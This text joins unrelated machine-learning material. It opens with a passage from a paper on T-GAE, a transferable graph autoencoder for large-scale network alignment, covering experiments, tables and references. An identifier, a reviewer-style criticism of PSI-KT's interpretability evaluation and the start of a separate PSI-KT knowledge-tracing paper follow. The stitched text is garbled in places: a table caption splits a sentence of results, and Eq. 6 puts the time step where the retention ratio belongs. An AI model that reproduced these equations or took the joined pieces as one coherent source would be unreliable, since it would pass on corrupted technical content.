\rho \left( \phi (X; S_i, H) \phi (X; S_i, H)^T \right), S_i \right) \right],$$ where $S_i \in S$ is a realization from a family of graphs and the expectation (empirical expectation is practice) is computed over this graph family. The generalized framework in (9) learns a mapping from graphs to node representations, and can be applied to out-of-distribution graphs that have not been observed during training. This twist in the architecture enables node embedding and graph matching for large-scale graphs, where training is computationally prohibitive. 4.3 ROBUST AND GENERALIZABLE NODE REPRESENTATIONS WITH SELF-SUPERVISED LEARNING (DATA AUGMENTATION) So far we proposed a convolutional framework to produce expressive node representations that are tailored to perform network alignment. In this subsection, we further upgrade our framework by ensuring the robustness and generalization ability of the proposed GNN mapping. In particular, for each graph, $S_i \in S$, we augment the training set with perturbed versions that are described by the following set of graph adjacencies $M_i = \{S_i^{(0)}, \ldots, S_i^{(j)}, \ldots, S_i^{(J)}\}$, that are perturbed versions of $S_i$. To do so we add or remove an edge with a certain probability yielding $\tilde{S}_i \in M$, such that $\tilde{S}_i = S_i + M_i$, where $M_i \in \{-1, 0, 1\}^{N \times N}$. Note that $M$ changes for each $\tilde{S}_i$, and $M[m,n]$ can be equal to 1 and −1 only if $S[m,n]$ is equal to 0 and 1 respectively. To train the proposed generalized graph-autoencoder we consider the following optimization problem: $$\min_{\mathcal{H}} \ E_S \left[ E_{M_i} \left[ l \left( \rho \left( \phi (X; \tilde{S}_i, H) \phi (X; \tilde{S}_i, H)^T \right), S_i \right) \right] \right],$$ where $E_S$ is the expectation with respect to the family of graphs $S$ and $E_{M_i}$ is the expectation with respect to the perturbed graphs $M_i$. In practice, $E_S, E_M$ correspond to empirical expectations. Note that training according to (10) also benefits the robustness of the model, which is crucial in deep learning tasks (Wang et al., 2022). A schematic illustration of the training process can be found in Fig. 1. Remark 4.1. (Large-scale network alignment by transference) The proposed framework learns a mapping $\phi : G \rightarrow \mathbb{R}^{N \times F}$ that produces expressive and robust node representations for a family of graphs $G \in \mathcal{G}$. This mapping is designed in such a way that the problem in (2) approximates the problem in (1) and allows solving network alignment in polynomial time. One of the main benefits of the proposed framework is that it enables large-scale network alignment. The transferability analysis of GNN encoders (Ruiz et al., 2020), suggests that we can train with small graphs and efficiently execute with much larger graphs when the substructures (motifs) that appear in the tested graphs, were also partially observed during training. Since the proposed generalized graph auto-encoder is trained with multiple graphs, a variety of motifs are observed during training, which cannot be observed with a classical graph autoencoder, and the proposed GNN encoder can be transferred to large-scale graphs. | Task | Dataset | \(|\mathcal{V}|\) | \(|\mathcal{E}|\) | # Aligned Edges | Network Type | |--------------------|--------------------------|-------------------|------------------|-----------------|-----------------------| | Graph Matching | C. elegans [Kunegis et al., 2013] | 453 | 2,025 | 2,025 | Interactome | | | Arenas [Leskovec & Kleinberg, 2014] | 1,135 | 3,982 | 3,982 | Email Communication | | | Douban [Zhang & Tong, 2016] | 3,906 | 7,215 | 7,215 | Social Network | | | Cora [Sen et al., 2008] | 2,708 | 5,278 | 5,278 | Citation Network | | | Ogbj [Fan et al., 2016] | 17,718 | 52,867 | 52,867 | Citation Network | | | Coauthor CS [Chen et al., 2018] | 18,533 | 81,894 | 81,894 | Coauthor Network | | Subgraph Matching | ACM-DBLP [Zhang & Tong, 2019] | 9,872 | 39,561 | 6,352 | Citation Network | | | Douban Online-Offline [Zhang & Tong, 2016] | 3,906 | 1,632 | 1,118 | Social Network | Table 2: Summary of Dataset statistics ### 4.4 ALIGNMENT AND COMPLEXITY ANALYSIS After learning the powerful T-GAE node embeddings, network alignment is performed by solving the linear assignment problem in \(O(n^3)\). An illustration of the assignment is presented in Fig. 2. The node features produced by T-GAE are used to calculate a pairwise distance matrix, followed by the greedy Hungarian algorithm to predict node correspondences. To analyze the complexity of our approach we study the 3 main parts of T-GAE: a) The design of the input structural features, b) The message-passing GNN that produces node embeddings, and c) the linear assignment algorithm. The computation of our neighborhood-based structural features is expected to take \(O(|\mathcal{V}|)\) in real graphs, as proved in Henderson et al. (2011). The computational and memory complexity of the message-passing GNN is \(O(|\mathcal{V}|c^2 + |\mathcal{E}|c)\), and \(O(|\mathcal{V}|c)\), where \(c\) is the width of the GNN. The computational complexity to align the nodes of the graph is \(O(|\mathcal{V}|^2)\) since we are using the suboptimal greedy Hungarian. If we want to optimally solve the linear assignment problem we need to use the Hungarian algorithm that has \(O(|\mathcal{V}|^3)\) complexity. If we want to process large graphs we can embed the nodes in 1-dimensional space and use a sorting algorithm with complexity \(O(|\mathcal{V}| \log(|\mathcal{V}|))\) to perform linear assignment. Overall the complexity of T-GAE is \(O(|\mathcal{V}|^2)\), or \(O(|\mathcal{V}|c^2 + |\mathcal{E}|c + |\mathcal{V}| \log(|\mathcal{V}|))\) for large graphs. ### 5 EXPERIMENTS In this section, we evaluate the performance of the proposed framework on both graph and sub-graph alignment with various benchmark networks. We compare against several baselines and assess the performance of the competing methods in terms of matching accuracy, hit-rate, and runtime. #### 5.1 DATASETS AND BASELINES Table 2 provides a brief overview of the considered networks. Our comparisons are conducted with 3 categories of baseline methods: (a) **GNN based methods**: WAlign (Gao et al., 2021b), GAE and VGAE (Kipf & Welling, 2016a); (b) **Graph/Node embedding techniques**: NetSimile (Berlingerio et al., 2013), Spectral (Umeyama, 1988), DeepWalk (Perozzi et al., 2014), Grover & Leskovec (2016b), GraphWave (Donnat et al., 2018) and LINE (Tang et al., 2015). (c) **Optimization based graph matching algorithms**: S-GWL (Xu et al., 2019a), ConeAlign (Chen et al., 2020) and FINAL (Zhang & Tong, 2016). Note that LINE, VGAE, DeepWalk, and Node2Vec are omitted from some experiments since they show very poor performance. The reason behind that is that they are not permutation equivariant. GraphWave is also excluded from the sub-graph matching experiment, it could not identify correlated nodes in two different graphs. In the case of graphs without attributes FINAL is equivalent to the popular Isorank (Singh et al., 2008) algorithm. FINAL is omitted in sub-graph matching experiments due to weak performance. 5.2 Model Details For graph matching experiments, we consider graphs without node attributes, and design the input to the GNN models, using 7 structural features proposed in (Berlingerio et al., 2013). The features include the degree of each node, the local and average clustering coefficient, and the number of edges, outgoing edges, and neighbors in each node’s egonet. This input feature is applied for all GNN-based methods. As a result, the performance of NetSimile, vanilla GAE and WAlign provide measures to assess the benefit of using T-GAE for node embedding. As illustrated in Figure 1, the structure of our proposed encoder consists of two MLPs and a series of GNN layers. The node features are processed by a 2-layer MLP and passed to all the GNN layers. We add skip connections between this MLP layer and all the subsequent GNN layers. The outputs of all GNN layers are concatenated and passed to another 2-layer MLP, followed by a linear decoder to generate the reconstructed graph. The model is optimized end to end by equation 10. We test the performance of the proposed T-GAE framework by experimenting on three kinds of message-passing mechanisms on graphs, i.e., GCN (Kipf & Welling, 2016b), GIN (Xu et al., 2019b) and GNNc (described in Equation 11). These mechanisms correspond to different functions \( f \) and \( g \) in Equation 4. We report the performance of GIN in the main body and the others in Appendix G. 5.3 Graph Matching Experiments To test the performance of the competing methods, we first attempt to match the graphs of Table 2 with permuted and perturbed versions of them. In particular, let \( G \) be a graph of Table 2 with adjacency matrix \( S \). For each graph we produce 10 permuted-perturbed versions according to \( \hat{S} = P(S + M)P^T \), where \( M \in \{-1, 0, 1\}^{N \times N} \) and \( P \) is a permutation matrix. For each perturbation level \( p \in \{0, 1\%, 5\% \} \), the total number of perturbations is defined as \( p|E| \), where \( |E| \) is the number of edges of the original graph. Then every edge and non-edge share the same probability of being removed or added. We also conducted experiments by removing edges according to the degrees of its vertices. Results for that model are discussed in Appendix H. 5.3.1 Transferability Analysis We first test the ability of T-GAE to perform large-scale network alignment and transfer across different datasets. To this end, we train T-GAE according to (9), where \( S \) consist of the small-size networks, i.e., Celegans, Arena, Douban, and Cora. Then we resort to transfer learning and use the T-GAE encoder to produce node embedding on (a) perturbed versions of Celegans, Arena, Douban, and Cora, and (b) larger graphs, i.e., Dblp, and Coauthor CS. Note that neither the larger graphs, nor the perturbed versions of the small graphs were considered during training. This is in contrast with all competing baselines that are retrained on every testing graph pair. The average and standard deviation of the matching accuracy for 10 randomly generated perturbation samples are presented in Table 3. Our first observation is that for zero perturbation most algorithms are able to achieve a high level of matching accuracy. This is expected, since for zero perturbation the network alignment is equivalent to graph isomorphism. Furthermore, there is a clear benefit of processing the NetSimile embeddings with GNNs since they offer up to 22% performance increase. When some perturbation is added, the conclusions are straightforward. Our proposed T-GAE markedly outperforms all the competing alternatives and shows the desired robustness to efficiently perform network alignment at 1% perturbation level, and its performance is consistent across all datasets and perturbation levels. Regarding the ability of T-GAE to perform large-scale network alignment the results are definitive. T-GAE enables low-complexity training with small graphs, and execution at larger settings by leveraging transfer learning. In particular, it is able to achieve very high levels of matching accuracy for both Dblp and Coauthor CS, for \( p = 0\%, 0.1\% \). To the best of our knowledge, this is the first attempt that performs exact alignment on a network at the order of 20k nodes and 80k edges. Comparing T-GAE with vanilla GAE, we observe that GAE is not robust to noise or transferable. This highlights the benefit of T-GAE in handling the distribution shift brought by the structural dissimilarity between different graphs. We also notice that S-GWL completely fails the Arenas graph. This happens because Arenas has isolated nodes, and S-GWL struggles in handling such graphs. To see this, we also test S-GWL on the Arenas graph after removing all the isolated nodes and it achieves 94.6 ± 0.5% matching accuracy at 0 perturbation, 28.7 ± 43.7% matching accuracy. Table 3: Graph matching accuracy on 10 randomly perturbed samples under different levels of edge editing. The proposed T-GAE is trained on the clean C elegans, Arena, Douban, and Cora networks, and tested on noisy versions of them and the larger Db lp, and Coauthor CS. We test 3 different message-passing mechanisms for the layers of T-GAE as annotated in the table. Accuracy above 80% is highlighted in green, 40% to 80% accuracy is in yellow, and performance below 40% is in red. at 1% perturbation and 37.4 ± 45.8% accuracy at 5% perturbation. The performance of S-GWL is also unstable in different noise levels, as removing edges may result in graphs with isolated nodes. Detailed runtime comparisons between T-GAE and all competing methods are presented in Appendix E. 5.3.2 PERTURBED TRAINING In the previous experiment, T-GAE is trained with a family of original graphs and tested to match perturbed versions of a larger family of graphs. T-GAE exhibited more robust performance compared to the baseline methods, however, its matching accuracy dropped significantly as the perturbation level of testing data increased. To tackle this problem we follow a self-supervised learning approach and train T-GAE with a family of real graphs and perturbations of them. We train according to (10), which aims to produce similar node embeddings for both the original graphs and perturbed versions of them. The data augmentation process follows the previously explained perturbation models. Similar to the previous experiment we train over the four small datasets and execute over all datasets. Note that training and testing is performed with different perturbations of the original graphs. Table 4 reports the testing results of the best T-GAE when training is performed with graph perturbations. | Algorithm | C elegans | Arenas | Douban | Cora | Db lp | Coauthor CS | |-----------|-----------|--------|--------|------|-------|-------------| | % perturbation | | | | | | | | T-GAE | 89.5 ± 1.3 | 88.4 ± 0.5 | 90.3 ± 0.4 | 87.4 ± 0.4 | 85.6 ± 0.1 | 97.6 ± 0.1 | | T-GAE with pert. | 89.7 ± 1.5 | 88.6 ± 0.6 | 90.1 ± 0.4 | 87.4 ± 0.5 | 85.7 ± 0.2 | 97.7 ± 0.1 | | 1% perturbation | | | | | | | | T-GAE | 84.1 ± 1.1 | 84.8 ± 0.6 | 84.9 ± 0.6 | 82.9 ± 0.5 | 79.1 ± 0.4 | 86.5 ± 0.8 | | T-GAE with pert. | 83.4 ± 1.6 | 85.6 ± 0.5 | 85.2 ± 0.6 | 83.2 ± 0.9 | 79.7 ± 0.4 | 87.1 ± 1.0 | | 5% perturbation | | | | | | | | T-GAE | 50.8 ± 3.3 | 47.1 ± 5.6 | 57.9 ± 6.1 | 58.2 ± 2.0 | 40.8 ± 2.1 | 26.9 ± 5.4 | | T-GAE with pert. | 52.3 ± 5.4 | 62.6 ± 2.2 | 58.5 ± 5.0 | 57.4 ± 2.7 | 43.6 ± 3.7 | 30.4 ± 7.4 | Table 4: Performance Comparison of T-GAE when trained with/without perturbation. We observe that incorporating graph perturbations in the training process significantly helps in high perturbation levels and benefits the robustness of the proposed method. On the other hand, when testing on low levels of perturbations, using the original graph or perturbations to train the T-GAE does not lead to significant changes. In particular, at 5% testing perturbation, T-GAE archives 15.5% increase in the Arenas dataset, whereas at 0% and 1% testing perturbation the increase is 0.2% and 0.8% respectively. 5.4 Sub-graph Matching Experiments In this subsection, we test the performance of T-GAE in matching subgraphs of different networks that have aligned nodes (nodes that represent the same entities in different networks). For example, in ACM-DBLP data set, the task is to find and match the papers that appear in both citation networks, whereas in social networks like Douban Online-Offline, we aim to identify the users that take part into both online and offline activities. To this end, we test the performance of the proposed T-GAE framework on these datasets. We compare two different approaches. In the first, T-GAE is trained according to (9) to produce embedding for the graph pair we aim to match, i.e., the ACM-DBLP pair, or the Douban Online-Offline pair. In the second, T-GAE is trained according to (9) with Celegans, Arena, Douban, and Cora, and transfer learning is used to match the targeted graph pair. To assess the performance of the competing algorithms we measure the hit rate (Järvelin & Kekäläinen [2000]). The results are presented in Fig. 3. The execution time for the reported results is presented in Appendix F. We observe a significant improvement in matching accuracy with GNN-based methods compared to traditional graph or node embedding techniques. These results demonstrate the ability of GNNs to generate expressive and robust node embeddings compared to classical algorithms. In particular, our proposed framework, T-GAE, consistently achieves the best performance among all competing methods. This suggests that the training framework (10), illustrated in Fig. 1 provides an efficient approach to network alignment. It is also notable, that T-GAE works well with both types of graph convolutions (GIN, GCN). This result indicates that the proposed framework has the potential to be extended to different types of neural networks. Limitations: Although our approach achieves state-of-the-art performance in aligning real-graphs, approaching network alignment with a learning method, remains a heuristic and does not offer optimality guarantees. Furthermore, in order to process large graphs we cast network alignment as a self-supervised task. As a result in small-scale settings where the task can be tackled with computationally intensive efficient methods, our algorithm is not expected to perform the best. Finally, for large graphs the complexity of T-GAE $O(|V|^2)$ is limiting and therefore our alternative method with complexity $O(|V|c^2 + |E|c + |V|\log(|V|))$ has to be employed. 6 Conclusion We proposed T-GAE, a generalized transferable graph autoencoder to perform network alignment on a large scale. T-GAE can be trained with multiple graphs and produce robust and permutation equivariant embeddings tailored to network alignment. The produced embeddings are related to the spectral decomposition of the graph and are at least as good in graph matching as certain spectral methods. The proposed approach leverages transfer learning and data augmentation and achieves high levels of matching accuracy for graphs with more than 15,000 nodes. Experiments with real-world benchmarks on both graph matching and subgraph matching tasks demonstrated the effectiveness and limits of the proposed approach. REFERENCES Ralph Abboud, Ismail Ilkan Ceylan, Martin Grohe, and Thomas Lukasiewicz. The surprising power of graph neural networks with random node initialization. In IJCAI, 2021. Kurt M Anstreicher and Nathan W Brixius. Solving quadratic assignment problems using convex quadratic programming relaxations. Optimization Methods and Software, 16(1-4):49–68, 2001. Michele Berlingerio, Danai Koutra, Tina Eliassi-Rad, and Christos Faloutsos. Network similarity via multiple social theories. In Proceedings of the 2013 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining, pp. 1439–1440, 2013. Jiazhou Chen, Hong Peng, Guoqiang Han, Hongmin Cai, and Jiulun Cai. HOGMMNC: a higher order graph matching with multiple network constraints model for gene–drug regulatory modules identification. Bioinformatics, 35(4):602–610, 07 2018. ISSN 1367-4803. doi: 10.1093/bioinformatics/bty662. URL https://doi.org/10.1093/bioinformatics/bty662 Xiyuan Chen, Mark Heimann, Fatemeh Vahedian, and Danai Koutra. Cone-align: Consistent network alignment with proximity-preserving node embedding. In Proceedings of the 29th ACM International Conference on Information & Knowledge Management, pp. 1985–1988, 2020. D. Conte, P. Foggia, C. Sansone, and M. Vento. Graph matching applications in pattern recognition and image processing. In Proceedings 2003 International Conference on Image Processing (Cat. No.03CH37429), volume 2, pp. II–21, 2003. doi: 10.1109/ICIP.2003.1246606. Jian Ding, Zongming Ma, Yihong Wu, and Jiaming Xu. Efficient random graph matching via degree profiles, 2020. Claire Donnat, Marinka Zitnik, David Hallac, and Jure Leskovec. Learning structural node embeddings via diffusion wavelets. In Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. ACM, jul 2018. doi: 10.1145/3219819.3220025. URL https://doi.org/10.1145%2F3219819.3220025 Frank Emmert-Streib, Matthias Dehmer, and Yongtang Shi. Fifty years of graph matching, network alignment and network comparison. Information sciences, 346:180–197, 2016. Soheil Feizi, Gerald Quon, Mariana Recamonde-Mendoza, Muriel Medard, Manolis Kellis, and Ali Jadbabaie. Spectral alignment of graphs. IEEE Transactions on Network Science and Engineering, 7(3):1182–1197, 2019. P. Gainza, F. Sverrisson, F. Monti, E. Rodolà, D. Boscaini, M. M. Bronstein, and B. E. Correia. Deciphering interaction fingerprints from protein molecular surfaces using geometric deep learning. Nature Methods, 17(2):184–192, February 2020. Fernando Gama, Joan Bruna, and Alejandro Ribeiro. Stability properties of graph neural networks. IEEE Transactions on Signal Processing, 68:5680–5695, 2020. Ji Gao, Xiao Huang, and Jundong Li. Unsupervised graph alignment with wasserstein distance discriminator. In Proceedings of the 27th ACM SIGKDD Conference on Knowledge Discovery & Data Mining, pp. 426–435, 2021a. Ji Gao, Xiao Huang, and Jundong Li. Unsupervised graph alignment with wasserstein distance discriminator. In Proceedings of the 27th ACM SIGKDD Conference on Knowledge Discovery & Data Mining, KDD ’21, pp. 426–435, New York, NY, USA, 2021b. Association for Computing Machinery. ISBN 9781450383325. doi: 10.1145/3447548.3467332. URL https://doi.org/10.1145/3447548.3467332 Justin Gilmer, Samuel S Schoenholz, Patrick F Riley, Oriol Vinyals, and George E Dahl. Neural message passing for quantum chemistry. In International conference on machine learning, pp. 1263–1272. PMLR, 2017. Aditya Grover and Jure Leskovec. node2vec: Scalable feature learning for networks. In Proceedings of the 22nd ACM SIGKDD international conference on Knowledge discovery and data mining, pp. 855–864, 2016a.
NgaLU2fP5D
The assessment of the model's interpretability is not entirely convincing. The limited dimensionality of hidden learner representations in deep learning methods (e.g., DKT, AKT) at just 16 may constrain the neural networks' capabilities. Furthermore, there is no supporting evidence indicating that the learner representations of PSI-KT and these deep learning baselines capture the same underlying student features, making direct comparisons less rational.
PREDICTIVE, SCALABLE AND INTERPRETABLE KNOWLEDGE TRACING ON STRUCTURED DOMAINS Hanqi Zhou\textsuperscript{1,2,4}, Robert Bamler\textsuperscript{1,3}, Charley M. Wu\textsuperscript{1,2,3*}, & Álvaro Tejero-Cantero\textsuperscript{1,2*} \textsuperscript{1}University of Tübingen, \textsuperscript{2}Cluster of Excellence Machine Learning, \textsuperscript{3}Tübingen AI Center, \textsuperscript{4}IMPRS-IS \{hanqi.zhou, robert.bamler, charley.wu, alvaro.tejero\}@uni-tuebingen.de ABSTRACT Intelligent tutoring systems optimize the selection and timing of learning materials to enhance understanding and long-term retention. This requires estimates of both the learner’s progress (“knowledge tracing”; KT), and the prerequisite structure of the learning domain (“knowledge mapping”). While recent deep learning models achieve high KT accuracy, they do so at the expense of the interpretability of psychologically-inspired models. In this work, we present a solution to this trade-off. PSI-KT is a hierarchical generative approach that explicitly models how both individual cognitive traits and the prerequisite structure of knowledge influence learning dynamics, thus achieving interpretability by design. Moreover, by using scalable Bayesian inference, PSI-KT targets the real-world need for efficient personalization even with a growing body of learners and learning histories. Evaluated on three datasets from online learning platforms, PSI-KT achieves superior multi-step predictive accuracy and scalable inference in continual-learning settings, all while providing interpretable representations of learner-specific traits and the prerequisite structure of knowledge that causally supports learning. In sum, predictive, scalable and interpretable knowledge tracing with solid knowledge mapping lays a key foundation for effective personalized learning to make education accessible to a broad, global audience. 1 INTRODUCTION The rise of online education platforms has created new opportunities for personalization in learning, motivating a renewed interest in how humans learn structured knowledge domains. Foundational theories in psychology (Ebbinghaus, 1885) have informed spaced repetition schedules (Settles & Meeder, 2016), which exploit the finding that an optimal spacing of learning sessions enhances memory retention. Yet beyond the timing of rehearsals, the sequential order of learning materials is also crucial, as evidenced by curriculum effects in learning (Dewey, 1910; Dekker et al., 2022), where exposure to simpler, prerequisite concepts can facilitate the apprehension of higher-level ideas. Cognitive science and pedagogical theories have long emphasized the relational structure of knowledge in human learning (Rumelhart, 2017; Piaget, 1970), with recent research showing that mastering prerequisites enhances concept learning (Lynn & Bassett, 2020; Karuza et al., 2016; Brändle et al., 2022). Yet, we still lack a predictive, scalable, and interpretable model of the structural-temporal dynamics of learning that could be used to develop future intelligent tutoring systems. Here, we present PSI-KT, a novel approach for inferring interpretable learner-specific cognitive traits and a shared knowledge graph of prerequisite concepts. We demonstrate our approach on three real-world educational datasets covering structured domains, where our model outperforms existing baselines in terms of predictive accuracy (both within- and between-learner generalization), scalability in a continual learning setting, and interpretability of learner traits and prerequisite graphs. The paper is organized as follows: We first introduce the knowledge tracing problem and summarize related work (Sec. 2). We then provide a formal description of PSI-KT and describe the inference method (Sec. 3). Experimental evaluations are organized into demonstrations of prediction performance, scalability, and interpretability (Sec. 4). Altogether, PSI-KT bridges machine learning and cognitive science, leveraging our understanding of human learning to build the foundations for automated tutoring systems with broad educational applications. *Equal contribution. Code at github.com/mlcolab/psi-kt 2 BACKGROUND In this section, we begin by defining the knowledge tracing problem and then review related work. 2.1 KNOWLEDGE TRACING FOR INTELLIGENT TUTORING SYSTEMS For almost 100 years (Pressey, 1926), researchers have developed intelligent tutoring systems (ITS) to support human learning through adaptive teaching materials and feedback. More recently, knowledge tracing (KT; Corbett & Anderson, 1994) emerged as a method for tracking learning progress by predicting a learner’s performance on different knowledge components (KCs), e.g., the ‘Pythagorean theorem’, based on past learning interactions. Here, we focus on the KT problem, with the goal of supporting the selection of teaching materials in future ITS applications. In this setting, a learner \( \ell \) receives exercises or flashcards for KCs \( x^\ell_n \in \{0, 1, \ldots, K\} \) at irregularly spaced times \( t^\ell_n \), whereupon the performance is recorded, often as correct/incorrect, \( y^\ell_n \in \{0, 1\} \). We can formalize KT as a supervised learning problem on time-series data, where the goal of the KT model is to predict future performance (e.g., \( \hat{y}_{N+1} \)) given all or part of the interaction history \( H_{t^\ell_N} := \{x^\ell_n, t^\ell_n, y^\ell_n\}_{n=1}^N \) available up to time \( t^\ell_N \). As part of the process, a KT model may infer specific representations of learners or of the learning domain to help prediction. If these representations are interpretable, they can be valuable for downstream learning personalization. 2.2 RELATED WORK We broadly categorize related KT approaches into psychological and deep learning methods. Psychological methods. Focusing on interpretability, psychological methods use domain knowledge to describe the temporal decay of memory (e.g., forgetting curves; Ebbinghaus, 1885), sometimes also modeling learner-specific characteristics. Factor-based regression models use hand-crafted features based on learner interactions and KC properties (e.g., repetition counts and KC easiness; Pavlik Jr et al., 2009). While they model KC-dependent memory dynamics (Pavlik et al., 2021; Gervet et al., 2020; Lindsey et al., 2014; Lord, 2012; Ackerman, 2014), they ignore the relational structure between KCs. Half-life Regression (HLR; Settles & Meeder, 2016) from Duolingo uses both correct and incorrect counts, while the Predictive Performance Equation (PPE; Walsh et al., 2018) models the elapsed time of every past interaction with a power function to account for spacing effects. By using shallow regression models with predefined features, these models achieve interpretability, but sacrifice prediction accuracy. Latent variable models use a probabilistic two-state Hidden Markov Model (Käser et al., 2017; Sao Pedro et al., 2013; Baker et al., 2008; Yudelson et al., 2013), representing either mastery or non-mastery of a given KC. These models are limited to binary states by design, do not account for learner dynamics, and for some, their numerous parameters hinder scalability. Another probabilistic model, hKT (Wang et al., 2021) accounts for structure and dynamics by modeling knowledge evolution as a multivariate Hawkes process. Close in spirit to our PSI-KT, this approach tracks KC structure but lacks any learner-specific representations. Deep learning methods. Deep learning methods use flexible models with many parameters to achieve high prediction accuracy. However, this flexibility also makes it difficult to interpret their learned internal representations. The first deep learning methods explicitly modeled sequential interactions with recurrent neural networks to overcome the dependence on fixed summary statistics in simpler regression models, with Deep Knowledge Tracing (DKT; Piech et al., 2015) pioneering the use of Long Short-Term Memory (LSTM) networks (Hochreiter & Schmidhuber, 1997). A similar architecture, dKTF (Nagatani et al., 2019) incorporated additional input features, whereas Shen et al. (2021) proposed an intricate modular architecture aimed at recovering interpretable learner representations, but neglecting KC relations. Structure-aware models leverage KC dependencies, accounting for the fact that human knowledge acquisition is structured by dependency relationships (i.e., concept maps; Hill, 2005; Koponen & Nousiainen, 2018; Lynn & Bassett, 2020). Tong et al. (2020) empirically estimate KC dependencies from the frequencies of successful transitions. AKT (Ghosh et al., 2020) relies on the attention mechanism (Vaswani et al., 2017) to implicitly capture structure (Pandey & Karypis, 2019; Choi et al., 2020; Shin et al., 2021; Liu et al., 2023), whereas GKT (Nakagawa et al., 2019) models it explicitly based on graph neural networks (Kipf & Welling, 2016). Recent work towards interpretable deep learning KT uses engineered features such as learner mastery and exercise difficulty (Minn et al., 2022), or infers them with neural networks (QIKT; Chen et al., 2023, iEKt; Long et al., 2021). While diverse approaches to interpretability exist (see Chen et al., 2023, for review), a comprehensive evaluation framework is still lacking. Figure 1: PSI-KT is a hierarchical probabilistic state-space model of learning. (a) Latent knowledge states for different KCs (colored curves) are inferred from observations. (b) Full hierarchical model for a single learner: cognitive traits $s_n$ control the coupled dynamics of states $z_n^k$, which give rise to observations $y_n$. (c) The dynamics combine memory decay (Eq. 6) and structural influences (Eq. 5). Here, we present our predictive, scalable and interpretable KT model (PSI-KT) as a psychologically-informed probabilistic deep learning approach, together with a comprehensive evaluation framework for interpretability. 3 JOINT DYNAMICAL AND STRUCTURAL MODEL OF LEARNING In this section, we describe PSI-KT, our probabilistic hierarchical state-space model of human learning (Fig. 1). Briefly, observations of learner performance $y$ (Fig. 1a, filled/unfilled boxes) provide indirect and noisy evidence about latent knowledge states $z$ (colored curves, with matching dots in Fig. 1b). These latent states evolve stochastically, in line with the psychophysics of memory (temporal decay in Fig. 1c), while simultaneously being subject to structural influences from performance on prerequisite KCs (structure in Fig. 1c). We introduce a second latent level of learner-specific traits $s$ (Fig. 1b, top), which govern the knowledge dynamics in an interpretable way. Below, we describe the method in more detail. We start with the generative model (Sec. 3.1). Next, we discuss the joint approximate Bayesian inference of latent variables and estimation of generative parameters (Sec. 3.2). Finally, we show how to derive multi-step performance predictions (see Sec. 3.3 and Fig. 7 in Appendix A.4 for a graphical overview of inference and prediction). 3.1 PROBABILISTIC STATE-SPACE GENERATIVE MODEL We conceptualize observations of learner performance as noisy measurements of an underlying time-dependent knowledge state, specific to each learner and KC. The evolution of knowledge states reflects the process of learning and forgetting, governed by learner-specific traits. Additionally, knowledge of different KCs informs one another according to learned prerequisite relationships. We translate these modeling assumptions into a generative model consisting of three main components: (i) the learner knowledge state across KCs, $z_n^\ell = [z_{n,1}^\ell, \ldots, z_{n,K}^\ell]^\top \in \mathbb{R}^K$ (colored curves in Fig. 1a), (ii) learner-specific cognitive traits $s_n^\ell \in \mathbb{R}^d$ (top row in Fig. 1b), and (iii) a shared static graph $\mathcal{A}$ of KCs whose edges $\alpha_{ik}$ quantify the probability for a KC $i$ to be a prerequisite for KC $k$ (Fig. 1c). State-space model. State-space models (SSMs) are a framework for partially observable dynamical processes. They represent the inherent noise of measurements $y$ by an emission distribution $p(y_n | z_n)$, separate from the stochasticity of state dynamics, modeled as a first-order Markov process with transition probabilities $p(z_n | z_{n-1})$. The state dynamics are initiated by sampling from an initial prior $p(z_1)$ to iteratively feed the transition kernel, and predictions can be drawn at any time from the emission distribution. To represent the influence of individual cognitive traits over the knowledge dynamics, we additionally condition the $z$-transitions on the traits $s$ (which also can be observed only indirectly). The three-level SSM hierarchy of PSI-KT consists of: Level 2 (latent cognitive traits): $$s_n^\ell \sim p_\theta(s_n^\ell | s_{n-1}^\ell) := N(s_n^\ell | H s_{n-1}^\ell, R)$$ Level 1 (latent knowledge states): $$z_n^\ell \sim p_\theta(z_n^\ell | z_{n-1}^\ell, s_n^\ell) := \prod_k N(z_{n,k}^\ell | m_{n,k}^\ell, w_n^\ell)$$ Level 0 (observed learner performance): $$\hat{y}_n^\ell \sim p(y_n^\ell | z_{n,k}^\ell) := \text{Bern}(\text{sigmoid}(z_{n,k}^\ell))$$ The choice of Gaussian initial priors (discussed below) and Gaussian transitions ensures tractability, while the Bernoulli emissions model the observed binary outcomes. We now unpack this model and all its parameters in detail, starting with the knowledge dynamics. Knowledge states \( z \). Recent KT methods (e.g., Nagatani et al., 2019) use an exponential forgetting function based on psychological theories (Ebbinghaus, 1885). Here, we augment this approach by adding stable long-term memory (Averell & Heathcote, 2011), and model the knowledge dynamics \( z_{\ell,k} \) of an isolated KC \( k \) as a mean-reverting stochastic (Ornstein-Uhlenbeck; OU) process: \[ dz_{\ell,k}/dt = \alpha^\ell (\mu^\ell - z_{\ell,k}) + \sigma^\ell \eta(t). \] (4) Accordingly, the state of knowledge \( z_{\ell} \) gradually reverts to a long-term mean \( \mu^\ell \) with rate \( \alpha^\ell \), subject to white noise fluctuations \( \eta(t) \) scaled by volatility \( \sigma^\ell \). To account for the influence of other KCs, we adjust the mean \( \mu^\ell_n \) using prerequisite weights \( a^{ik} \) (defined in Eq. 7 below), modulated by the learner’s transfer ability \( \gamma^\ell_n \): \[ \tilde{\mu}_{\ell,k} := \mu^\ell_n + (\gamma^\ell_n/K) \sum_{i \neq k} a^{ik} z_{\ell,i}. \] (5) We obtain the mean \( m_{\ell,k} \) and variance \( w_{\ell} \) of the transition kernel in Eq. 2 by marginalizing the OU process over one time step \( \tau^\ell_n := t^\ell_n - t^\ell_{n-1} \), which can be done analytically\(^1\): \[ m_{\ell,k} = \tau^\ell_n z_{\ell,k,n-1} + (1 - \tau^\ell_n) \tilde{\mu}_{\ell,k}, \quad \text{with retention ratio } r^\ell_n := e^{-\alpha^\ell_n \tau^\ell_n} \in (0, 1). \] (6) As the time since the last interaction \( \tau^\ell_n \) grows, the retention ratio \( r^\ell_n \) decreases exponentially with rate \( \alpha^\ell_n \), and the knowledge state reverts to the long-term mean \( \tilde{\mu}_{\ell,k} \), which partly depends on the learner’s mastery of prerequisite KCs (Eq. 5). This balances short-term and long-term learning, reflecting empirical findings from memory research (Averell & Heathcote, 2011). The structural influences are accounted for in the dynamics of \( z_{\ell,k} \), thus justifying the conditional independence assumed in Eq. 2. A Gaussian initial prior \( p_\theta(z_{\ell,k}^1 | \bar{z}, w_1) = \mathcal{N}(z_{\ell,k}^1 | \bar{z}, w_1) \), where \( \bar{z}, w_1 \in \mathbb{R} \) are part of the generative parameters \( \theta \), completes our dynamical model of knowledge states. Learner-specific cognitive 